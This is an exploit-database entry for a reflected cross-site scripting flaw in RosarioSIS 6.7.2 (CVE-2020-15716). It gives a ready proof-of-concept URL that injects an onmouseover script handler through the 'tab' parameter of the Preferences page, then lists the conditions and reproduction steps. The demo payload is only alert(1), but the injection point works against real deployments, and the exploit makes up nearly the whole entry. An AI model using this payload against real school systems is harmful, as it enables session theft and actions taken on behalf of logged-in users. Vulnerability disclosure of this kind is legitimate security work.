# Exploit Title: RosarioSIS 6.7.2 - Cross Site Scripting (XSS)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://gitlab.com/francoisjacquet/rosariosis
# Software Link: https://gitlab.com/francoisjacquet/rosariosis
# Version: 6.7.2
# Tested on: Windows
# CVE : CVE-2020-15716


Proof Of Concept
http://rosariosis/Modules.php?modname=Users/Preferences.php&tab=%22%20onmouseover%3Dalert%281%29%20x%3D%22

**Conditions**:  
1. User must be authenticated (as shown by the session checks in `Warehous.php`)
2. `modfunc` parameter must **not** be present in the request


Steps to Reproduce:
1. Log in as an admin user.
2. Send the request.
3. Observe the result